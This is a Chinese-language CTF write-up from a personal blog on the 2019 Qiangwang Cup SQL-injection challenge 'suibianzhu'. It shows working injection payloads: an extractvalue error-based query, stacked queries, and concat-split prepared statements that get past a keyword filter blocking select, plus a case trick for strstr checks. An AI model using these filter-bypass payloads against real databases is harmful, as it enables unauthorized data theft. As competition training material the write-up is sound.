C1imber's Blog

2019强网杯-过滤select的注入

字数统计: 458阅读时长: 1 min
2019/05/28 Share

2019强网杯-过滤select的注入

随便注

这道题的题目就是随便注,说是取自某次真实渗透环境,确定了这道题是考察注入,经测试发现为单引号包裹的字符型注入,但是存在存在过滤,过滤的sql关键字如下

1
preg_match("/select|update|delete|drop|insert|where|\./i", $inject);

mark
这里过滤了select关键字,/i表示对大小写进行检查,所以大小写绕过无效,所以这里需要想别的办法,首先通过报错注入可以获取数据库的相关信息

通过报错注入获取当前数据库类型与版本:

http://117.78.39.172:32689/?inject=-1%27%20and%20extractvalue(1,concat(1,version()))--+

mark
.27-MariaDB-0ubuntu0.16.04.1

获取当前数据库名:
mark
supersqli

这里因为严格过滤了select关键字,导致不能继续注入,但是之后发现可以执行多语句,通过堆叠查询成功获取当前数据库(supersqli)下的表名

http://117.78.39.172:32689/?inject=-1%27;use%20supersqli;show%20tables;--+

mark
于是有了一个清晰的思路,可以通过执行多语句,将要执行的sql语句进行拼接,这样就可以将过滤的 sql关键字拆分绕过检测,通过动态执行sql语句发现1919810931114514表当中存在flag字段,payload如下

1
';use information_schema;set @sql=concat('s','elect column_name from columns wher','e table_name="1919810931114514"');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

mark
之后就可以获取flag列的内容了

1
';use supersqli;set @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

mark

(需要注意的一点是这一点使用了strstr对set和prepare关键字进行了检查,但是strstr检查不对大小写进行检查,所以这里可以通过大小写绕过,set和prepare关键字只要有一个是大写就可以绕过)
mark

CATALOG
  1. 1. 2019强网杯-过滤select的注入
    1. 1.0.1. 随便注